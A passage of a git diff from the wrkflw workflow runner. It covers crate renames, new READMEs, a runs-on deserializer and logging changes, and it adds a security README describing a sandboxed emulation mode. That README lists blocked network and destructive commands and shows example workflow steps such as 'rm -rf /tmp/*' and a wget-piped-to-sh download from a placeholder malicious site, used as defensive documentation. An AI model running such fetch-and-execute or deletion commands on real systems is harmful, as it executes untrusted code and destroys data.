Matrix expansion utilities used to compute all job combinations and format labels.
|
||||
|
||||
- Supports `include`, `exclude`, `max-parallel`, and `fail-fast`
|
||||
- Provides display helpers for UI/CLI
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_matrix::{MatrixConfig, expand_matrix};
|
||||
use serde_yaml::Value;
|
||||
use std::collections::HashMap;
|
||||
|
||||
let mut cfg = MatrixConfig::default();
|
||||
cfg.parameters.insert("os".into(), Value::from(vec!["ubuntu", "alpine"])) ;
|
||||
|
||||
let combos = expand_matrix(&cfg).expect("expand");
|
||||
assert!(!combos.is_empty());
|
||||
```
|
||||
@@ -1,12 +1,17 @@
|
||||
[package]
|
||||
name = "models"
|
||||
name = "wrkflw-models"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Data models for wrkflw"
|
||||
description = "Data models and structures for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
thiserror.workspace = true
|
||||
|
||||
16
crates/models/README.md
Normal file
16
crates/models/README.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## wrkflw-models
|
||||
|
||||
Common data structures shared across crates.
|
||||
|
||||
- `ValidationResult` for structural/semantic checks
|
||||
- GitLab pipeline models (serde types)
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
let mut res = ValidationResult::new();
|
||||
res.add_issue("missing jobs".into());
|
||||
assert!(!res.is_valid);
|
||||
```
|
||||
@@ -1,14 +1,19 @@
|
||||
[package]
|
||||
name = "parser"
|
||||
name = "wrkflw-parser"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Parser functionality for wrkflw"
|
||||
description = "Workflow parsing functionality for wrkflw execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
matrix = { path = "../matrix" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-matrix.workspace = true
|
||||
|
||||
# External dependencies
|
||||
jsonschema.workspace = true
|
||||
|
||||
13
crates/parser/README.md
Normal file
13
crates/parser/README.md
Normal file
@@ -0,0 +1,13 @@
|
||||
## wrkflw-parser
|
||||
|
||||
Parsers and schema helpers for GitHub/GitLab workflow files.
|
||||
|
||||
- GitHub Actions workflow parsing and JSON Schema validation
|
||||
- GitLab CI parsing helpers
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
// High-level crates (`wrkflw` and `wrkflw-executor`) wrap parser usage.
|
||||
// Use those unless you are extending parsing behavior directly.
|
||||
```
|
||||
1711
crates/parser/src/github-workflow.json
Normal file
1711
crates/parser/src/github-workflow.json
Normal file
File diff suppressed because it is too large
Load Diff
3012
crates/parser/src/gitlab-ci.json
Normal file
3012
crates/parser/src/gitlab-ci.json
Normal file
File diff suppressed because it is too large
Load Diff
@@ -1,11 +1,11 @@
|
||||
use crate::schema::{SchemaType, SchemaValidator};
|
||||
use crate::workflow;
|
||||
use models::gitlab::Pipeline;
|
||||
use models::ValidationResult;
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
use thiserror::Error;
|
||||
use wrkflw_models::gitlab::Pipeline;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
#[derive(Error, Debug)]
|
||||
pub enum GitlabParserError {
|
||||
@@ -130,7 +130,7 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
|
||||
|
||||
// Create a new job
|
||||
let mut job = workflow::Job {
|
||||
runs_on: "ubuntu-latest".to_string(), // Default runner
|
||||
runs_on: Some(vec!["ubuntu-latest".to_string()]), // Default runner
|
||||
needs: None,
|
||||
steps: Vec::new(),
|
||||
env: HashMap::new(),
|
||||
@@ -139,6 +139,9 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
|
||||
if_condition: None,
|
||||
outputs: None,
|
||||
permissions: None,
|
||||
uses: None,
|
||||
with: None,
|
||||
secrets: None,
|
||||
};
|
||||
|
||||
// Add job-specific environment variables
|
||||
@@ -204,8 +207,8 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
|
||||
for (i, service) in services.iter().enumerate() {
|
||||
let service_name = format!("service-{}", i);
|
||||
let service_image = match service {
|
||||
models::gitlab::Service::Simple(name) => name.clone(),
|
||||
models::gitlab::Service::Detailed { name, .. } => name.clone(),
|
||||
wrkflw_models::gitlab::Service::Simple(name) => name.clone(),
|
||||
wrkflw_models::gitlab::Service::Detailed { name, .. } => name.clone(),
|
||||
};
|
||||
|
||||
let service = workflow::Service {
|
||||
@@ -230,13 +233,13 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use std::path::PathBuf;
|
||||
// use std::path::PathBuf; // unused
|
||||
use tempfile::NamedTempFile;
|
||||
|
||||
#[test]
|
||||
fn test_parse_simple_pipeline() {
|
||||
// Create a temporary file with a simple GitLab CI/CD pipeline
|
||||
let mut file = NamedTempFile::new().unwrap();
|
||||
let file = NamedTempFile::new().unwrap();
|
||||
let content = r#"
|
||||
stages:
|
||||
- build
|
||||
@@ -257,7 +260,7 @@ test_job:
|
||||
fs::write(&file, content).unwrap();
|
||||
|
||||
// Parse the pipeline
|
||||
let pipeline = parse_pipeline(&file.path()).unwrap();
|
||||
let pipeline = parse_pipeline(file.path()).unwrap();
|
||||
|
||||
// Validate basic structure
|
||||
assert_eq!(pipeline.stages.as_ref().unwrap().len(), 2);
|
||||
|
||||
@@ -3,8 +3,8 @@ use serde_json::Value;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
|
||||
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("../../../schemas/github-workflow.json");
|
||||
const GITLAB_CI_SCHEMA: &str = include_str!("../../../schemas/gitlab-ci.json");
|
||||
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("github-workflow.json");
|
||||
const GITLAB_CI_SCHEMA: &str = include_str!("gitlab-ci.json");
|
||||
|
||||
#[derive(Debug, Clone, Copy)]
|
||||
pub enum SchemaType {
|
||||
|
||||
@@ -1,8 +1,8 @@
|
||||
use matrix::MatrixConfig;
|
||||
use serde::{Deserialize, Deserializer, Serialize};
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
use wrkflw_matrix::MatrixConfig;
|
||||
|
||||
use super::schema::SchemaValidator;
|
||||
|
||||
@@ -26,6 +26,26 @@ where
|
||||
}
|
||||
}
|
||||
|
||||
// Custom deserializer for runs-on field that handles both string and array formats
|
||||
fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
|
||||
where
|
||||
D: Deserializer<'de>,
|
||||
{
|
||||
#[derive(Deserialize)]
|
||||
#[serde(untagged)]
|
||||
enum StringOrVec {
|
||||
String(String),
|
||||
Vec(Vec<String>),
|
||||
}
|
||||
|
||||
let value = Option::<StringOrVec>::deserialize(deserializer)?;
|
||||
match value {
|
||||
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
|
||||
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
|
||||
None => Ok(None),
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
pub struct WorkflowDefinition {
|
||||
pub name: String,
|
||||
@@ -38,10 +58,11 @@ pub struct WorkflowDefinition {
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
pub struct Job {
|
||||
#[serde(rename = "runs-on")]
|
||||
pub runs_on: String,
|
||||
#[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
|
||||
pub runs_on: Option<Vec<String>>,
|
||||
#[serde(default, deserialize_with = "deserialize_needs")]
|
||||
pub needs: Option<Vec<String>>,
|
||||
#[serde(default)]
|
||||
pub steps: Vec<Step>,
|
||||
#[serde(default)]
|
||||
pub env: HashMap<String, String>,
|
||||
@@ -55,6 +76,13 @@ pub struct Job {
|
||||
pub outputs: Option<HashMap<String, String>>,
|
||||
#[serde(default)]
|
||||
pub permissions: Option<HashMap<String, String>>,
|
||||
// Reusable workflow (job-level 'uses') support
|
||||
#[serde(default)]
|
||||
pub uses: Option<String>,
|
||||
#[serde(default)]
|
||||
pub with: Option<HashMap<String, String>>,
|
||||
#[serde(default)]
|
||||
pub secrets: Option<serde_yaml::Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
|
||||
@@ -1,22 +1,30 @@
|
||||
[package]
|
||||
name = "runtime"
|
||||
name = "wrkflw-runtime"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Runtime environment for wrkflw"
|
||||
description = "Runtime execution environment for wrkflw workflow engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
logging = { path = "../logging", version = "0.4.0" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-logging.workspace = true
|
||||
|
||||
# External dependencies
|
||||
async-trait.workspace = true
|
||||
once_cell = "1.19"
|
||||
once_cell.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
tempfile = "3.9"
|
||||
tempfile.workspace = true
|
||||
tokio.workspace = true
|
||||
futures = "0.3"
|
||||
utils = { path = "../utils", version = "0.4.0" }
|
||||
which = "4.4"
|
||||
futures.workspace = true
|
||||
ignore = "0.4"
|
||||
wrkflw-utils.workspace = true
|
||||
which.workspace = true
|
||||
regex.workspace = true
|
||||
thiserror.workspace = true
|
||||
|
||||
13
crates/runtime/README.md
Normal file
13
crates/runtime/README.md
Normal file
@@ -0,0 +1,13 @@
|
||||
## wrkflw-runtime
|
||||
|
||||
Runtime abstractions for executing steps in containers or emulation.
|
||||
|
||||
- Container management primitives used by the executor
|
||||
- Emulation mode helpers (run on host without containers)
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
// This crate is primarily consumed by `wrkflw-executor`.
|
||||
// Prefer using the executor API instead of calling runtime directly.
|
||||
```
|
||||
258
crates/runtime/README_SECURITY.md
Normal file
258
crates/runtime/README_SECURITY.md
Normal file
@@ -0,0 +1,258 @@
|
||||
# Security Features in wrkflw Runtime
|
||||
|
||||
This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.
|
||||
|
||||
## Overview
|
||||
|
||||
The wrkflw runtime provides multiple execution modes with varying levels of security:
|
||||
|
||||
1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
|
||||
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
|
||||
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
|
||||
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)
|
||||
|
||||
## Security Modes
|
||||
|
||||
### 🔒 Secure Emulation Mode (Recommended for Local Development)
|
||||
|
||||
The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.
|
||||
|
||||
#### Features
|
||||
|
||||
- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
|
||||
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
|
||||
- **Resource Limits**: Enforces CPU, memory, and execution time limits
|
||||
- **Filesystem Isolation**: Restricts file access to allowed paths only
|
||||
- **Environment Sanitization**: Filters dangerous environment variables
|
||||
- **Process Monitoring**: Tracks and limits spawned processes
|
||||
|
||||
#### Usage
|
||||
|
||||
```bash
|
||||
# Use secure emulation mode (recommended)
|
||||
wrkflw run --runtime secure-emulation .github/workflows/build.yml
|
||||
|
||||
# Or via TUI
|
||||
wrkflw tui --runtime secure-emulation
|
||||
```
|
||||
|
||||
#### Command Whitelist/Blacklist
|
||||
|
||||
**Allowed Commands (Safe):**
|
||||
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
|
||||
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
|
||||
- Build tools: `make`, `cmake`, `javac`, `dotnet`
|
||||
|
||||
**Blocked Commands (Dangerous):**
|
||||
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
|
||||
- Network tools: `wget`, `curl`, `ssh`, `nc`
|
||||
- Process control: `kill`, `killall`, `systemctl`
|
||||
|
||||
#### Resource Limits
|
||||
|
||||
```rust
|
||||
// Default configuration
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512, // 512 MB
|
||||
max_cpu_percent: 80, // 80% CPU
|
||||
max_processes: 10, // Max 10 processes
|
||||
allow_network: false, // No network access
|
||||
strict_mode: true, // Whitelist-only mode
|
||||
}
|
||||
```
|
||||
|
||||
### ⚠️ Legacy Emulation Mode (Unsafe)
|
||||
|
||||
The original emulation mode executes commands directly on the host system without any sandboxing. **This mode will be deprecated and should only be used for trusted workflows.**
|
||||
|
||||
```bash
|
||||
# Legacy unsafe mode (not recommended)
|
||||
wrkflw run --runtime emulation .github/workflows/build.yml
|
||||
```
|
||||
|
||||
## Example: Blocked vs Allowed Commands
|
||||
|
||||
### ❌ Blocked Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will be blocked in secure emulation mode
|
||||
steps:
|
||||
- name: Dangerous command
|
||||
run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion
|
||||
|
||||
- name: System modification
|
||||
run: sudo apt-get install package # BLOCKED: sudo usage
|
||||
|
||||
- name: Network access
|
||||
run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
|
||||
```
|
||||
|
||||
### ✅ Allowed Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will run successfully in secure emulation mode
|
||||
steps:
|
||||
- name: Build project
|
||||
run: cargo build --release # ALLOWED: Development tool
|
||||
|
||||
- name: Run tests
|
||||
run: cargo test # ALLOWED: Testing
|
||||
|
||||
- name: List files
|
||||
run: ls -la target/ # ALLOWED: Safe file listing
|
||||
|
||||
- name: Format code
|
||||
run: cargo fmt --check # ALLOWED: Code formatting
|
||||
```
|
||||
|
||||
## Security Warnings and Messages
|
||||
|
||||
When dangerous commands are detected, wrkflw provides clear security messages:
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
|
||||
This command was blocked for security reasons.
|
||||
If you need to run this command, please use Docker or Podman mode instead.
|
||||
```
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
|
||||
This command was blocked because it matches a known dangerous pattern.
|
||||
Please review your workflow for potentially harmful commands.
|
||||
```
|
||||
|
||||
## Configuration Examples
|
||||
|
||||
### Workflow-Friendly Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;
|
||||
|
||||
let config = create_workflow_sandbox_config();
|
||||
// - Allows network access for package downloads
|
||||
// - Higher resource limits for CI/CD workloads
|
||||
// - Less strict mode for development flexibility
|
||||
```
|
||||
|
||||
### Strict Security Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_strict_sandbox_config;
|
||||
|
||||
let config = create_strict_sandbox_config();
|
||||
// - No network access
|
||||
// - Very limited command set
|
||||
// - Low resource limits
|
||||
// - Strict whitelist-only mode
|
||||
```
|
||||
|
||||
### Custom Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
|
||||
use std::collections::HashSet;
|
||||
use std::path::PathBuf;
|
||||
|
||||
let mut config = SandboxConfig::default();
|
||||
|
||||
// Custom allowed commands
|
||||
config.allowed_commands = ["echo", "ls", "cargo"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
// Custom resource limits
|
||||
config.max_execution_time = Duration::from_secs(60);
|
||||
config.max_memory_mb = 256;
|
||||
|
||||
// Custom allowed paths
|
||||
config.allowed_write_paths.insert(PathBuf::from("./target"));
|
||||
config.allowed_read_paths.insert(PathBuf::from("./src"));
|
||||
|
||||
let sandbox = Sandbox::new(config)?;
|
||||
```
|
||||
|
||||
## Migration Guide
|
||||
|
||||
### From Unsafe Emulation to Secure Emulation
|
||||
|
||||
1. **Change Runtime Flag**:
|
||||
```bash
|
||||
# Old (unsafe)
|
||||
wrkflw run --runtime emulation workflow.yml
|
||||
|
||||
# New (secure)
|
||||
wrkflw run --runtime secure-emulation workflow.yml
|
||||
```
|
||||
|
||||
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
|
||||
|
||||
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
|
||||
- Using Docker/Podman mode for those specific workflows
|
||||
- Modifying the workflow to use allowed alternatives
|
||||
- Creating a custom sandbox configuration
|
||||
|
||||
### When to Use Each Mode
|
||||
|
||||
| Use Case | Recommended Mode | Reason |
|
||||
|----------|------------------|---------|
|
||||
| Local development | Secure Emulation | Good balance of security and convenience |
|
||||
| Untrusted workflows | Docker/Podman | Maximum isolation |
|
||||
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
|
||||
| Testing workflows | Secure Emulation | Fast execution with safety |
|
||||
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Command Blocked Error
|
||||
|
||||
If you encounter a security block:
|
||||
|
||||
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
|
||||
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
|
||||
3. **Modify the workflow**: Use safer alternatives where possible
|
||||
|
||||
### Resource Limit Exceeded
|
||||
|
||||
If your workflow hits resource limits:
|
||||
|
||||
1. **Optimize the workflow**: Reduce resource usage where possible
|
||||
2. **Use custom configuration**: Increase limits for specific use cases
|
||||
3. **Use container mode**: For resource-intensive workflows
|
||||
|
||||
### Path Access Denied
|
||||
|
||||
If file access is denied:
|
||||
|
||||
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
|
||||
2. **Use relative paths**: Work within the project directory
|
||||
3. **Use container mode**: For workflows requiring system-wide file access
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Default to Secure Mode**: Use secure emulation mode by default for local development
|
||||
2. **Test Workflows**: Always test workflows in secure mode before deploying
|
||||
3. **Review Security Messages**: Pay attention to security blocks and warnings
|
||||
4. **Use Containers for Production**: Use Docker/Podman for production deployments
|
||||
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements
|
||||
|
||||
## Security Considerations
|
||||
|
||||
- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers
|
||||
- For maximum security with untrusted code, always use container modes
|
||||
- The sandbox is most effective against script errors and typos that could damage your system
|
||||
- Always review workflows from untrusted sources before execution
|
||||
|
||||
## Contributing Security Improvements
|
||||
|
||||
If you find security issues or have suggestions for improvements:
|
||||
|
||||
1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities
|
||||
2. **Suggest Command Patterns**: Help improve dangerous pattern detection
|
||||
3. **Test Edge Cases**: Help us identify bypass techniques
|
||||
4. **Documentation**: Improve security documentation and examples
|
||||
|
||||
---
|
||||
|
||||
For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).
|
||||
@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
|
||||
) -> Result<String, ContainerError>;
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub struct ContainerOutput {
|
||||
pub stdout: String,
|
||||
pub stderr: String,
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use async_trait::async_trait;
|
||||
use logging;
|
||||
use once_cell::sync::Lazy;
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
@@ -9,6 +8,9 @@ use std::process::Command;
|
||||
use std::sync::Mutex;
|
||||
use tempfile::TempDir;
|
||||
use which;
|
||||
use wrkflw_logging;
|
||||
|
||||
use ignore::{gitignore::GitignoreBuilder, Match};
|
||||
|
||||
// Global collection of resources to clean up
|
||||
static EMULATION_WORKSPACES: Lazy<Mutex<Vec<PathBuf>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
@@ -162,9 +164,9 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
|
||||
// Log more detailed debugging information
|
||||
logging::info(&format!("Executing command in container: {}", command_str));
|
||||
logging::info(&format!("Working directory: {}", working_dir.display()));
|
||||
logging::info(&format!("Command length: {}", command.len()));
|
||||
wrkflw_logging::info(&format!("Executing command in container: {}", command_str));
|
||||
wrkflw_logging::info(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::info(&format!("Command length: {}", command.len()));
|
||||
|
||||
if command.is_empty() {
|
||||
return Err(ContainerError::ContainerExecution(
|
||||
@@ -174,13 +176,13 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
|
||||
// Print each command part separately for debugging
|
||||
for (i, part) in command.iter().enumerate() {
|
||||
logging::info(&format!("Command part {}: '{}'", i, part));
|
||||
wrkflw_logging::info(&format!("Command part {}: '{}'", i, part));
|
||||
}
|
||||
|
||||
// Log environment variables
|
||||
logging::info("Environment variables:");
|
||||
wrkflw_logging::info("Environment variables:");
|
||||
for (key, value) in env_vars {
|
||||
logging::info(&format!(" {}={}", key, value));
|
||||
wrkflw_logging::info(&format!(" {}={}", key, value));
|
||||
}
|
||||
|
||||
// Find actual working directory - determine if we should use the current directory instead
|
||||
@@ -197,7 +199,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// If found, use that as the working directory
|
||||
if let Some(path) = workspace_path {
|
||||
if path.exists() {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using environment-defined workspace: {}",
|
||||
path.display()
|
||||
));
|
||||
@@ -206,7 +208,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// Fallback to current directory
|
||||
let current_dir =
|
||||
std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using current directory: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
@@ -215,7 +217,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
} else {
|
||||
// Fallback to current directory
|
||||
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using current directory: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
@@ -225,7 +227,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
working_dir.to_path_buf()
|
||||
};
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using actual working directory: {}",
|
||||
actual_working_dir.display()
|
||||
));
|
||||
@@ -233,8 +235,8 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// Check if path contains the command (for shell script execution)
|
||||
let command_path = which::which(command[0]);
|
||||
match &command_path {
|
||||
Ok(path) => logging::info(&format!("Found command at: {}", path.display())),
|
||||
Err(e) => logging::error(&format!(
|
||||
Ok(path) => wrkflw_logging::info(&format!("Found command at: {}", path.display())),
|
||||
Err(e) => wrkflw_logging::error(&format!(
|
||||
"Command not found in PATH: {} - Error: {}",
|
||||
command[0], e
|
||||
)),
|
||||
@@ -246,7 +248,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
|| command_str.starts_with("mkdir ")
|
||||
|| command_str.starts_with("mv ")
|
||||
{
|
||||
logging::info("Executing as shell command");
|
||||
wrkflw_logging::info("Executing as shell command");
|
||||
// Execute as a shell command
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
@@ -264,7 +266,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!(
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Shell command completed with exit code: {}",
|
||||
exit_code
|
||||
));
|
||||
@@ -314,7 +316,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
|
||||
// Always use the current directory for cargo/rust commands rather than the temporary directory
|
||||
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using project directory for Rust command: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
@@ -326,7 +328,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
if *key == "CARGO_HOME" && value.contains("${CI_PROJECT_DIR}") {
|
||||
let cargo_home =
|
||||
value.replace("${CI_PROJECT_DIR}", ¤t_dir.to_string_lossy());
|
||||
logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
|
||||
wrkflw_logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
|
||||
cmd.env(key, cargo_home);
|
||||
} else {
|
||||
cmd.env(key, value);
|
||||
@@ -338,7 +340,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
cmd.args(&parts[1..]);
|
||||
}
|
||||
|
||||
logging::debug(&format!(
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Executing Rust command: {} in {}",
|
||||
command_str,
|
||||
current_dir.display()
|
||||
@@ -350,7 +352,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!("Command exit code: {}", exit_code));
|
||||
wrkflw_logging::debug(&format!("Command exit code: {}", exit_code));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
@@ -405,7 +407,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!("Command completed with exit code: {}", exit_code));
|
||||
wrkflw_logging::debug(&format!("Command completed with exit code: {}", exit_code));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
@@ -443,12 +445,12 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
|
||||
wrkflw_logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
@@ -490,14 +492,75 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
/// Create a gitignore matcher for the given directory
|
||||
fn create_gitignore_matcher(
|
||||
dir: &Path,
|
||||
) -> Result<Option<ignore::gitignore::Gitignore>, std::io::Error> {
|
||||
let mut builder = GitignoreBuilder::new(dir);
|
||||
|
||||
// Try to add .gitignore file if it exists
|
||||
let gitignore_path = dir.join(".gitignore");
|
||||
if gitignore_path.exists() {
|
||||
builder.add(&gitignore_path);
|
||||
}
|
||||
|
||||
// Add some common ignore patterns as fallback
|
||||
if let Err(e) = builder.add_line(None, "target/") {
|
||||
wrkflw_logging::warning(&format!("Failed to add default ignore pattern: {}", e));
|
||||
}
|
||||
if let Err(e) = builder.add_line(None, ".git/") {
|
||||
wrkflw_logging::warning(&format!("Failed to add default ignore pattern: {}", e));
|
||||
}
|
||||
|
||||
match builder.build() {
|
||||
Ok(gitignore) => Ok(Some(gitignore)),
|
||||
Err(e) => {
|
||||
wrkflw_logging::warning(&format!("Failed to build gitignore matcher: {}", e));
|
||||
Ok(None)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn copy_directory_contents(source: &Path, dest: &Path) -> std::io::Result<()> {
|
||||
copy_directory_contents_with_gitignore(source, dest, None)
|
||||
}
|
||||
|
||||
fn copy_directory_contents_with_gitignore(
|
||||
source: &Path,
|
||||
dest: &Path,
|
||||
gitignore: Option<&ignore::gitignore::Gitignore>,
|
||||
) -> std::io::Result<()> {
|
||||
// Create the destination directory if it doesn't exist
|
||||
fs::create_dir_all(dest)?;
|
||||
|
||||
// If no gitignore provided, try to create one for the root directory
|
||||
let root_gitignore;
|
||||
let gitignore = if gitignore.is_none() {
|
||||
root_gitignore = create_gitignore_matcher(source)?;
|
||||
root_gitignore.as_ref()
|
||||
} else {
|
||||
gitignore
|
||||
};
|
||||
|
||||
// Iterate through all entries in the source directory
|
||||
for entry in fs::read_dir(source)? {
|
||||
let entry = entry?;
|
||||
let path = entry.path();
|
||||
|
||||
// Check if the file should be ignored according to .gitignore
|
||||
if let Some(gitignore) = gitignore {
|
||||
let relative_path = path.strip_prefix(source).unwrap_or(&path);
|
||||
